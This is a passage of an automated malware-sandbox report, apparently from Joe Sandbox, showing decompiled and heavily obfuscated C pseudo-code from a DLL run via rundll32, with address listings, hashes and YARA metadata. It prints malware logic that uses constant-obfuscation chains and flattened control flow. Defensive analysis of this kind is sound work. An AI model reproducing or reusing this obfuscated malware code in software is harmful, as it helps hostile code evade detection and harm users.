				_v80 = _v80 ^ 0xfb972484;
				_v80 = _v80 << 2;
				_v80 = _v80 << 0xf;
				_v80 = _v80 ^ 0xdb950905;
				_v44 = 0x96980f;
				_v44 = _v44 ^ 0xfeb8bb56;
				_v44 = _v44 ^ 0xfe2f3013;
				_v64 = 0x454cfa;
				_v64 = _v64 ^ 0x45fe36ac;
				_t224 = 0x43;
				_v64 = _v64 / _t224;
				_v64 = _v64 ^ 0x010b84d0;
				_v68 = 0xb73a82;
				_v68 = _v68 | 0xd419dac3;
				_t225 = 0x23;
				_v68 = _v68 / _t225;
				_v68 = _v68 ^ 0x061f1f3c;
				_v60 = 0xe80863;
				_v60 = _v60 * 7;
				_v60 = _v60 ^ 0x88fb80a0;
				_v60 = _v60 ^ 0x8ea007f2;
				_v40 = 0x80f530;
				_v40 = _v40 ^ 0xcef24483;
				_v40 = _v40 ^ 0xce7935e2;
				_v92 = 0x233377;
				_v92 = _v92 ^ 0x61e14959;
				_v92 = _v92 + 0xffffa5e4;
				_v92 = _v92 + 0xf94b;
				_v92 = _v92 ^ 0x61c7ad44;
				_v88 = 0xbad9cc;
				_v88 = _v88 | 0x5a2a09a8;
				_v88 = _v88 * 0x2f;
				_v88 = _v88 | 0xecc1c683;
				_v88 = _v88 ^ 0xecc3849f;
				_v56 = 0xb0d301;
				_v56 = _v56 + 0xa0bb;
				_v56 = _v56 << 0xf;
				_v56 = _v56 ^ 0xb9db0742;
				_v36 = 0xab48cf;
				_v36 = _v36 * 0x24;
				_v36 = _v36 ^ 0x1811952a;
				_v84 = 0x104632;
				_v84 = _v84 + 0x4a21;
				_v84 = _v84 ^ 0x8dbd106a;
				_v84 = _v84 + 0xfe54;
				_v84 = _v84 ^ 0x8daed025;
				_t226 = _v4;
				_t197 = _v8;
				_t230 = _v8;
				_v72 = 0x1611ea;
				_v72 = _v72 ^ 0xe055e86d;
				_v72 = _v72 >> 0xd;
				_v72 = _v72 >> 5;
				_v72 = _v72 ^ 0x0003993e;
				_v32 = 0x799484;
				_v32 = _v32 ^ 0xb4488d59;
				_v32 = _v32 ^ 0xb439947f;
				L1:
				while(1) {
					do {
						while(_t228 != 0x5161e0c) {
							if(_t228 == 0xb95f952) {
								_t229 = E0069C032( &_v16, _t198, _t184, _t230, _v44, _v64, _v68);
								_t231 =  &(_t231[5]);
								_v20 = _t229;
								if(_t229 == 0) {
									L18:
									E00698519(_v72, _v32, _t197);
								} else {
									_t204 = _v16;
									if(_t204 == 0) {
										L17:
										if(_t229 != 0) {
											_t189 = _v8;
											 *_t189 = _t197;
											 *((intOrPtr*)(_t189 + 4)) = _t226 - _t230;
										} else {
											goto L18;
										}
									} else {
										_v48 = _v48 + _t204;
										_t230 = _t230 - _t204;
										if(_t230 != 0) {
											L10:
											_t184 = _v48;
											L11:
											_t198 = _v24;
											_t228 = 0xb95f952;
											continue;
										} else {
											_t205 = _t226 + _t226;
											_push(_t205);
											_push(_t205);
											_v12 = _t205;
											_t193 = E00687FF2(_t205);
											_v48 = _t193;
											if(_t193 == 0) {
												goto L17;
											} else {
												E0068ED7E(_v88, _t193, _v56, _t197, _t226);
												E00698519(_v36, _v84, _t197);
												_t197 = _v48;
												_t230 = _t226;
												_t231 =  &(_t231[4]);
												_t196 = _t197 + _t226;
												_t226 = _v12;
												_v48 = _t196;
												if(_t230 == 0) {
													goto L17;
												} else {
													goto L10;
												}
											}
										}
									}
								}
							} else {
								if(_t228 != 0xe611c04) {
									goto L15;
								} else {
									_t228 = 0x5161e0c;
									continue;
								}
							}
							L20:
							return _t229;
						}
						_t226 = 0x10000;
						_push(_t198);
						_push(_t198);
						_t184 = E00687FF2(0x10000);
						_t197 = _t184;
						if(_t197 == 0) {
							_t198 = _v24;
							_t228 = 0xa3056fc;
							goto L15;
						} else {
							_v48 = _t184;
							_t230 = 0x10000;
							goto L11;
						}
						goto L20;
						L15:
						_t184 = _v48;
					} while (_t228 != 0xa3056fc);
					_t229 = _v20;
					goto L17;
				}
			}










































                                                                                                                      0x0069a2e8
                                                                                                                      0x0069a2e8
                                                                                                                      0x0069a2ef
                                                                                                                      0x0069a2f3
                                                                                                                      0x0069a2f7
                                                                                                                      0x0069a2ff
                                                                                                                      0x0069a304
                                                                                                                      0x0069a30c
                                                                                                                      0x0069a314
                                                                                                                      0x0069a31c
                                                                                                                      0x0069a321
                                                                                                                      0x0069a329
                                                                                                                      0x0069a331
                                                                                                                      0x0069a339
                                                                                                                      0x0069a342
                                                                                                                      0x0069a34b
                                                                                                                      0x0069a350
                                                                                                                      0x0069a355
                                                                                                                      0x0069a35b
                                                                                                                      0x0069a363
                                                                                                                      0x0069a36b
                                                                                                                      0x0069a373
                                                                                                                      0x0069a378
                                                                                                                      0x0069a37d
                                                                                                                      0x0069a385
                                                                                                                      0x0069a38d
                                                                                                                      0x0069a395
                                                                                                                      0x0069a39d
                                                                                                                      0x0069a3a5
                                                                                                                      0x0069a3b1
                                                                                                                      0x0069a3b6
                                                                                                                      0x0069a3bc
                                                                                                                      0x0069a3c4
                                                                                                                      0x0069a3cc
                                                                                                                      0x0069a3d8
                                                                                                                      0x0069a3db
                                                                                                                      0x0069a3df
                                                                                                                      0x0069a3e7
                                                                                                                      0x0069a3f4
                                                                                                                      0x0069a3f8
                                                                                                                      0x0069a400
                                                                                                                      0x0069a408
                                                                                                                      0x0069a410
                                                                                                                      0x0069a418
                                                                                                                      0x0069a420
                                                                                                                      0x0069a428
                                                                                                                      0x0069a430
                                                                                                                      0x0069a438
                                                                                                                      0x0069a440
                                                                                                                      0x0069a448
                                                                                                                      0x0069a450
                                                                                                                      0x0069a45d
                                                                                                                      0x0069a461
                                                                                                                      0x0069a469
                                                                                                                      0x0069a471
                                                                                                                      0x0069a479
                                                                                                                      0x0069a481
                                                                                                                      0x0069a486
                                                                                                                      0x0069a48e
                                                                                                                      0x0069a49b
                                                                                                                      0x0069a49f
                                                                                                                      0x0069a4a7
                                                                                                                      0x0069a4af
                                                                                                                      0x0069a4b7
                                                                                                                      0x0069a4bf
                                                                                                                      0x0069a4c7
                                                                                                                      0x0069a4cf
                                                                                                                      0x0069a4d3
                                                                                                                      0x0069a4d7
                                                                                                                      0x0069a4df
                                                                                                                      0x0069a4e7
                                                                                                                      0x0069a4ef
                                                                                                                      0x0069a4f4
                                                                                                                      0x0069a4f9
                                                                                                                      0x0069a501
                                                                                                                      0x0069a509
                                                                                                                      0x0069a511
                                                                                                                      0x00000000
                                                                                                                      0x0069a519
                                                                                                                      0x0069a519
                                                                                                                      0x0069a519
                                                                                                                      0x0069a52b
                                                                                                                      0x0069a559
                                                                                                                      0x0069a55b
                                                                                                                      0x0069a55e
                                                                                                                      0x0069a564
                                                                                                                      0x0069a63c
                                                                                                                      0x0069a645
                                                                                                                      0x0069a56a
                                                                                                                      0x0069a56a
                                                                                                                      0x0069a570
                                                                                                                      0x0069a638
                                                                                                                      0x0069a63a
                                                                                                                      0x0069a651
                                                                                                                      0x0069a657
                                                                                                                      0x0069a659
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0069a576
                                                                                                                      0x0069a576
                                                                                                                      0x0069a57a
                                                                                                                      0x0069a57c
                                                                                                                      0x0069a5df
                                                                                                                      0x0069a5df
                                                                                                                      0x0069a5e3
                                                                                                                      0x0069a5e3
                                                                                                                      0x0069a5e7
                                                                                                                      0x00000000
                                                                                                                      0x0069a57e
                                                                                                                      0x0069a582
                                                                                                                      0x0069a58f
                                                                                                                      0x0069a590
                                                                                                                      0x0069a591
                                                                                                                      0x0069a595
                                                                                                                      0x0069a59a
                                                                                                                      0x0069a5a2
                                                                                                                      0x00000000
                                                                                                                      0x0069a5a8
                                                                                                                      0x0069a5b4
                                                                                                                      0x0069a5c2
                                                                                                                      0x0069a5c7
                                                                                                                      0x0069a5cb
                                                                                                                      0x0069a5cd
                                                                                                                      0x0069a5d0
                                                                                                                      0x0069a5d3
                                                                                                                      0x0069a5d7
                                                                                                                      0x0069a5dd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0069a5dd
                                                                                                                      0x0069a5a2
                                                                                                                      0x0069a57c
                                                                                                                      0x0069a570
                                                                                                                      0x0069a52d
                                                                                                                      0x0069a533
                                                                                                                      0x00000000
                                                                                                                      0x0069a539
                                                                                                                      0x0069a539
                                                                                                                      0x00000000
                                                                                                                      0x0069a539
                                                                                                                      0x0069a533
                                                                                                                      0x0069a65d
                                                                                                                      0x0069a665
                                                                                                                      0x0069a665
                                                                                                                      0x0069a5f5
                                                                                                                      0x0069a604
                                                                                                                      0x0069a605
                                                                                                                      0x0069a606
                                                                                                                      0x0069a60b
                                                                                                                      0x0069a611
                                                                                                                      0x0069a61b
                                                                                                                      0x0069a61f
                                                                                                                      0x00000000
                                                                                                                      0x0069a613
                                                                                                                      0x0069a613
                                                                                                                      0x0069a617
                                                                                                                      0x00000000
                                                                                                                      0x0069a617
                                                                                                                      0x00000000
                                                                                                                      0x0069a624
                                                                                                                      0x0069a624
                                                                                                                      0x0069a628
                                                                                                                      0x0069a634
                                                                                                                      0x00000000
                                                                                                                      0x0069a634

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !J$YIa$mU$s
                                                                                                                      • API String ID: 0-3335770892
                                                                                                                      • Opcode ID: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
                                                                                                                      • Instruction ID: fee6806227ab921bbf9c194e211ab6c702f68c66b6622815bffad170ba5e1841
                                                                                                                      • Opcode Fuzzy Hash: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
                                                                                                                      • Instruction Fuzzy Hash: 5E913F715093409BC394DF69C18581BFBF6BBC4758F504A1EF99597220D3B4DA09CB87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00684EE3 Relevance: 5.2, Strings: 4, Instructions: 168COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E00684EE3(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				char _v608;
				void* _t203;
				void* _t204;
				void* _t207;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				intOrPtr _t216;
				void* _t221;

				_v84 = _v84 & 0x00000000;
				_v88 = 0xf9097a;
				_v32 = 0xbcbe1d;
				_v32 = _v32 << 9;
				_v32 = _v32 << 9;
				_v32 = _v32 << 0xb;
				_v32 = _v32 ^ 0xa0062323;
				_v16 = 0x782140;
				_v16 = _v16 + 0xfffffe34;
				_v16 = _v16 + 0xfffffe18;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0xe0701d9a;
				_v40 = 0x7af846;
				_v40 = _v40 + 0xffff28b3;
				_v40 = _v40 << 0xd;
				_v40 = _v40 + 0xffffd351;
				_v40 = _v40 ^ 0x441384bc;
				_v68 = 0xebfd4;
				_v68 = _v68 + 0xffff2b98;
				_t212 = 0x4b;
				_v68 = _v68 / _t212;
				_v68 = _v68 ^ 0x000f3184;
				_v48 = 0x77c678;
				_t213 = 0x72;
				_v48 = _v48 * 0x4d;
				_v48 = _v48 + 0x6b8c;
				_v48 = _v48 ^ 0x240efbe4;
				_v24 = 0xae1064;
				_v24 = _v24 / _t213;
				_v24 = _v24 << 7;
				_v24 = _v24 ^ 0x1be7fa9d;
				_v24 = _v24 ^ 0x1b226397;
				_v72 = 0x44bde7;
				_v72 = _v72 | 0x5f63ee23;
				_v72 = _v72 ^ 0x5f6de837;
				_v56 = 0x5a94a4;
				_v56 = _v56 >> 9;
				_t214 = 0xc;
				_v56 = _v56 * 0x2a;
				_v56 = _v56 ^ 0x0003dc1b;
				_v8 = 0x2a4d30;
				_v8 = _v8 + 0xff2b;
				_v8 = _v8 | 0x9a82811b;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0xbcdbc31f;
				_v64 = 0xa41a91;
				_v64 = _v64 | 0x62aa1889;
				_v64 = _v64 << 0xd;
				_v64 = _v64 ^ 0xc357e7aa;
				_v36 = 0x90fe9;
				_v36 = _v36 >> 0xa;
				_v36 = _v36 | 0x57d87c49;
				_v36 = _v36 / _t214;
				_v36 = _v36 ^ 0x0755636a;
				_v28 = 0x5fda7e;
				_v28 = _v28 + 0xffff2d0f;
				_v28 = _v28 << 0xa;
				_v28 = _v28 + 0xdffb;
				_v28 = _v28 ^ 0x7c1a8a5e;
				_v20 = 0xaf632f;
				_v20 = _v20 >> 8;
				_v20 = _v20 << 9;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 ^ 0x0003fa93;
				_v12 = 0x960758;
				_v12 = _v12 ^ 0x64ee01f0;
				_v12 = _v12 | 0x3d3dd2ba;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0xbeed48c5;
				_v80 = 0xba0fdf;
				_v80 = _v80 + 0xfd2d;
				_v80 = _v80 ^ 0x00b93168;
				_v60 = 0x5f834c;
				_v60 = _v60 ^ 0x963b7b6a;
				_t215 = 0x3f;
				_v60 = _v60 * 0x3e;
				_v60 = _v60 ^ 0x6c73d449;
				_v76 = 0x4b89c6;
				_v76 = _v76 >> 6;
				_v76 = _v76 ^ 0x0008f57a;
				_v52 = 0x3d488e;
				_v52 = _v52 << 6;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0x5226582a;
				_v44 = 0x8cf369;
				_v44 = _v44 ^ 0x25329c0c;
				_v44 = _v44 / _t215;
				_v44 = _v44 >> 0xe;
				_v44 = _v44 ^ 0x0005c7da;
				_t216 =  *0x6a3e10; // 0x0
				_t203 = E0068B6CF(_t216 + 0x1c, _v32, _v16, _v40);
				_t241 = _a4 + 0x2c;
				_t204 = E0068B23C(_v68, _v48, _a4 + 0x2c, _v24, _v72, _t203);
				_t248 = _t204;
				if(_t204 != 0) {
					_push(_v64);
					_push(_v8);
					_t207 = E0069DCF7(_v56, 0x681000, _t248);
					_pop(_t221);
					E006847CE( *((intOrPtr*)(_a8 + 0x18)), _v36, _t221, _v28, _v20, _t207, _t241, _v12, _v80);
					E0068A8B0(_v60, _t207, _v76);
					E00691F8A(_v52, _v44,  &_v608);
				}
				return 1;
			}


































                                                                                                                      0x00684eec
                                                                                                                      0x00684ef2
                                                                                                                      0x00684ef9
                                                                                                                      0x00684f00
                                                                                                                      0x00684f04
                                                                                                                      0x00684f08
                                                                                                                      0x00684f0c
                                                                                                                      0x00684f13
                                                                                                                      0x00684f1a
                                                                                                                      0x00684f21
                                                                                                                      0x00684f28
                                                                                                                      0x00684f2c
                                                                                                                      0x00684f33
                                                                                                                      0x00684f3a
                                                                                                                      0x00684f41
                                                                                                                      0x00684f45
                                                                                                                      0x00684f4c
                                                                                                                      0x00684f53
                                                                                                                      0x00684f5a
                                                                                                                      0x00684f67
                                                                                                                      0x00684f6c
                                                                                                                      0x00684f71
                                                                                                                      0x00684f78
                                                                                                                      0x00684f83
                                                                                                                      0x00684f86
                                                                                                                      0x00684f89
                                                                                                                      0x00684f90
                                                                                                                      0x00684f97
                                                                                                                      0x00684fa5
                                                                                                                      0x00684fa8
                                                                                                                      0x00684fac
                                                                                                                      0x00684fb3
                                                                                                                      0x00684fba
                                                                                                                      0x00684fc1
                                                                                                                      0x00684fc8
                                                                                                                      0x00684fcf
                                                                                                                      0x00684fd6
                                                                                                                      0x00684fde
                                                                                                                      0x00684fdf
                                                                                                                      0x00684fe2
                                                                                                                      0x00684fe9
                                                                                                                      0x00684ff0
                                                                                                                      0x00684ff7
                                                                                                                      0x00684ffe
                                                                                                                      0x00685002
                                                                                                                      0x00685009
                                                                                                                      0x00685010
                                                                                                                      0x00685017
                                                                                                                      0x0068501b
                                                                                                                      0x00685022
                                                                                                                      0x00685029
                                                                                                                      0x0068502d
                                                                                                                      0x00685039
                                                                                                                      0x0068503c
                                                                                                                      0x00685043
                                                                                                                      0x0068504a
                                                                                                                      0x00685051
                                                                                                                      0x00685055
                                                                                                                      0x0068505c
                                                                                                                      0x00685063
                                                                                                                      0x0068506a
                                                                                                                      0x0068506e
                                                                                                                      0x00685072
                                                                                                                      0x00685076
                                                                                                                      0x0068507d
                                                                                                                      0x00685084
                                                                                                                      0x0068508b
                                                                                                                      0x00685094
                                                                                                                      0x00685098
                                                                                                                      0x0068509f
                                                                                                                      0x006850a6
                                                                                                                      0x006850ad
                                                                                                                      0x006850b4
                                                                                                                      0x006850bb
                                                                                                                      0x006850c8
                                                                                                                      0x006850c9
                                                                                                                      0x006850cc
                                                                                                                      0x006850d3
                                                                                                                      0x006850da
                                                                                                                      0x006850de
                                                                                                                      0x006850e5
                                                                                                                      0x006850ec
                                                                                                                      0x006850f0
                                                                                                                      0x006850f4
                                                                                                                      0x006850fb
                                                                                                                      0x00685102
                                                                                                                      0x0068510e
                                                                                                                      0x00685111
                                                                                                                      0x00685115
                                                                                                                      0x00685122
                                                                                                                      0x0068512e
                                                                                                                      0x0068513a
                                                                                                                      0x00685147
                                                                                                                      0x0068514f
                                                                                                                      0x00685151
                                                                                                                      0x00685154
                                                                                                                      0x0068515c
                                                                                                                      0x00685162
                                                                                                                      0x0068516d
                                                                                                                      0x00685189
                                                                                                                      0x00685196
                                                                                                                      0x006851a8
                                                                                                                      0x006851b0
                                                                                                                      0x006851b8

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID: *X&R$0M*$7m_$@!x
                                                                                                                      • API String ID: 1586166983-4050865940
                                                                                                                      • Opcode ID: f2083dd505e262dd827e8649ca072e3fbfcb04e3b0148b53eb846bab85f69218
                                                                                                                      • Instruction ID: b025aa5f522d44901eabc8aedb3e4d0c3fb99ff25fce30d2516244ea4169a77b
                                                                                                                      • Opcode Fuzzy Hash: f2083dd505e262dd827e8649ca072e3fbfcb04e3b0148b53eb846bab85f69218
                                                                                                                      • Instruction Fuzzy Hash: 10810271C0121DEBCF49DFA1D88A8EEBBB2FB44718F208118E411B6260D7B55A4ACF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0068EA99 Relevance: 5.2, Strings: 4, Instructions: 153COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0068EA99(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t136;
				signed int _t147;
				void* _t150;
				intOrPtr* _t152;
				void* _t154;
				void* _t165;
				signed int _t166;
				signed int _t167;
				signed int* _t171;

				_push(_a16);
				_t152 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006920B9(_t136);
				_v52 = 0x4b44d9;
				_t171 =  &(( &_v68)[6]);
				_t165 = 0;
				_t154 = 0x40ad1f2;
				_t166 = 0x41;
				_v52 = _v52 * 0x5c;
				_v52 = _v52 ^ 0xd486af61;
				_v52 = _v52 ^ 0xcf8a129f;
				_v24 = 0x8b17cc;
				_v24 = _v24 + 0xffff02b5;
				_v24 = _v24 ^ 0x008a1a91;
				_v64 = 0xcc4e1;
				_v64 = _v64 ^ 0x71537a57;
				_v64 = _v64 | 0xbc84d226;
				_v64 = _v64 + 0x8a58;
				_v64 = _v64 ^ 0xbde0890e;
				_v12 = 0x10173e;
				_v12 = _v12 / _t166;
				_v12 = _v12 ^ 0x000bb2e7;
				_v16 = 0xcbf18d;
				_v16 = _v16 + 0x7f8c;
				_v16 = _v16 ^ 0x00cd0dea;
				_v20 = 0x7a67ce;
				_v20 = _v20 << 1;
				_v20 = _v20 ^ 0x00fa626e;
				_v68 = 0x7779f8;
				_v68 = _v68 + 0xa85e;
				_v68 = _v68 << 0x10;
				_v68 = _v68 >> 3;
				_v68 = _v68 ^ 0x0443aeb4;
				_v28 = 0xee6391;
				_v28 = _v28 ^ 0x2bfa2339;
				_v28 = _v28 ^ 0x2b1bacd2;
				_v32 = 0x87b642;
				_v32 = _v32 + 0xffff3baa;
				_v32 = _v32 ^ 0x008fda80;
				_v36 = 0x3b697f;
				_v36 = _v36 | 0x5675f49c;
				_v36 = _v36 ^ 0x5679bffa;
				_v40 = 0x254a84;
				_v40 = _v40 * 0x67;
				_v40 = _v40 ^ 0x0f0bd396;
				_v44 = 0xfc206d;
				_v44 = _v44 * 0x45;
				_v44 = _v44 ^ 0x43f6aa11;
				_v56 = 0x3dd941;
				_v56 = _v56 ^ 0x94d2d45c;
				_v56 = _v56 >> 9;
				_v56 = _v56 ^ 0x00419011;
				_v4 = 0xdcf5c3;
				_v4 = _v4 ^ 0x0d464ae6;
				_v4 = _v4 ^ 0x0d938ce3;
				_v60 = 0xe23f0;
				_v60 = _v60 ^ 0x0435e191;
				_v60 = _v60 ^ 0xbde67646;
				_v60 = _v60 ^ 0xb922f804;
				_v60 = _v60 ^ 0x00f2260b;
				_v8 = 0x523a90;
				_v8 = _v8 * 0x75;
				_v8 = _v8 ^ 0x259e6962;
				_v48 = 0x46565e;
				_t167 = 3;
				_v48 = _v48 * 0x6a;
				_t168 = _v4;
				_v48 = _v48 / _t167;
				_v48 = _v48 ^ 0x09b4f31e;
				do {
					while(_t154 != 0x40ad1f2) {
						if(_t154 == 0x458d12f) {
							_t147 = E00688F65(_v12, _v16, _a12, _v20, _v24, _t154, _v64, _v68, _v52, _v28, _t154, 0);
							_t168 = _t147;
							_t171 =  &(_t171[0xa]);
							if(_t147 != 0xffffffff) {
								_t154 = 0x4af2a99;
								continue;
							}
						} else {
							if(_t154 == 0x4af2a99) {
								_t150 = E006819B8(_t154, _v36,  *((intOrPtr*)(_t152 + 4)), _v40, _t168, _v44, _v56, _t152 + 4,  *_t152);
								_t171 =  &(_t171[8]);
								_t165 = _t150;
								_t154 = 0xe5b5021;
								continue;
							} else {
								if(_t154 != 0xe5b5021) {
									goto L11;
								} else {
									E00691E67(_v4, _v60, _v8, _v48, _t168);
								}
							}
						}
						L6:
						return _t165;
					}
					_t154 = 0x458d12f;
					L11:
				} while (_t154 != 0xd2f352d);
				goto L6;
			}





























                                                                                                                      0x0068eaa0
                                                                                                                      0x0068eaa4
                                                                                                                      0x0068eaa6
                                                                                                                      0x0068eaaa
                                                                                                                      0x0068eaae
                                                                                                                      0x0068eab2
                                                                                                                      0x0068eab3
                                                                                                                      0x0068eab4
                                                                                                                      0x0068eab9
                                                                                                                      0x0068eac1
                                                                                                                      0x0068eacb
                                                                                                                      0x0068eacd
                                                                                                                      0x0068ead4
                                                                                                                      0x0068ead5
                                                                                                                      0x0068ead9
                                                                                                                      0x0068eae1
                                                                                                                      0x0068eae9
                                                                                                                      0x0068eaf1
                                                                                                                      0x0068eaf9
                                                                                                                      0x0068eb01
                                                                                                                      0x0068eb09
                                                                                                                      0x0068eb11
                                                                                                                      0x0068eb19
                                                                                                                      0x0068eb21
                                                                                                                      0x0068eb29
                                                                                                                      0x0068eb37
                                                                                                                      0x0068eb3b
                                                                                                                      0x0068eb43
                                                                                                                      0x0068eb4b
                                                                                                                      0x0068eb53
                                                                                                                      0x0068eb5b
                                                                                                                      0x0068eb63
                                                                                                                      0x0068eb67
                                                                                                                      0x0068eb6f
                                                                                                                      0x0068eb77
                                                                                                                      0x0068eb7f
                                                                                                                      0x0068eb84
                                                                                                                      0x0068eb89
                                                                                                                      0x0068eb91
                                                                                                                      0x0068eb99
                                                                                                                      0x0068eba1
                                                                                                                      0x0068eba9
                                                                                                                      0x0068ebb1
                                                                                                                      0x0068ebb9
                                                                                                                      0x0068ebc1
                                                                                                                      0x0068ebc9
                                                                                                                      0x0068ebd1
                                                                                                                      0x0068ebd9
                                                                                                                      0x0068ebe6
                                                                                                                      0x0068ebea
                                                                                                                      0x0068ebf2
                                                                                                                      0x0068ebff
                                                                                                                      0x0068ec03
                                                                                                                      0x0068ec0b
                                                                                                                      0x0068ec13
                                                                                                                      0x0068ec1b
                                                                                                                      0x0068ec20
                                                                                                                      0x0068ec28
                                                                                                                      0x0068ec30
                                                                                                                      0x0068ec38
                                                                                                                      0x0068ec40
                                                                                                                      0x0068ec48
                                                                                                                      0x0068ec50
                                                                                                                      0x0068ec58
                                                                                                                      0x0068ec60
                                                                                                                      0x0068ec68
                                                                                                                      0x0068ec75
                                                                                                                      0x0068ec79
                                                                                                                      0x0068ec81
                                                                                                                      0x0068ec92
                                                                                                                      0x0068ec98
                                                                                                                      0x0068eca2
                                                                                                                      0x0068eca6
                                                                                                                      0x0068ecaa
                                                                                                                      0x0068ecb2
                                                                                                                      0x0068ecb2
                                                                                                                      0x0068ecc0
                                                                                                                      0x0068ed52
                                                                                                                      0x0068ed57
                                                                                                                      0x0068ed59
                                                                                                                      0x0068ed5f
                                                                                                                      0x0068ed61
                                                                                                                      0x00000000
                                                                                                                      0x0068ed61
                                                                                                                      0x0068ecc2
                                                                                                                      0x0068ecc8
                                                                                                                      0x0068ed16
                                                                                                                      0x0068ed1b
                                                                                                                      0x0068ed1e
                                                                                                                      0x0068ed20
                                                                                                                      0x00000000
                                                                                                                      0x0068ecca
                                                                                                                      0x0068ecd0
                                                                                                                      0x00000000
                                                                                                                      0x0068ecd6
                                                                                                                      0x0068ece7
                                                                                                                      0x0068ecec
                                                                                                                      0x0068ecd0
                                                                                                                      0x0068ecc8
                                                                                                                      0x0068ecef
                                                                                                                      0x0068ecf8
                                                                                                                      0x0068ecf8
                                                                                                                      0x0068ed6b
                                                                                                                      0x0068ed6d
                                                                                                                      0x0068ed6d
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -5/$WzSq$^VF$JF
                                                                                                                      • API String ID: 0-2399144359
                                                                                                                      • Opcode ID: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
                                                                                                                      • Instruction ID: da895376754ad924504928e0475bae77b13e8f68f623a5037dded88d53232869
                                                                                                                      • Opcode Fuzzy Hash: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
                                                                                                                      • Instruction Fuzzy Hash: C07122714083419BC758DF65C98681BBBF2FBC9758F504A1DF69696220C3B2DA48DF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00699BCF Relevance: 5.1, Strings: 4, Instructions: 133COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00699BCF() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				unsigned int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _t111;
				signed int _t115;
				signed int _t117;
				void* _t118;
				signed int _t132;
				void* _t134;
				signed int _t135;
				signed int* _t136;

				_t136 =  &_v568;
				_v560 = 0x297e3c;
				_v560 = _v560 >> 9;
				_t118 = 0x4ead2fe;
				_v560 = _v560 + 0xe8be;
				_v560 = _v560 ^ 0xc9c09221;
				_v560 = _v560 ^ 0xc9c20db8;
				_v540 = 0x190e1d;
				_v540 = _v540 >> 7;
				_v540 = _v540 >> 0xd;
				_v540 = _v540 ^ 0x000cdd3b;
				_v544 = 0x86c2f0;
				_v544 = _v544 | 0x0d7eac20;
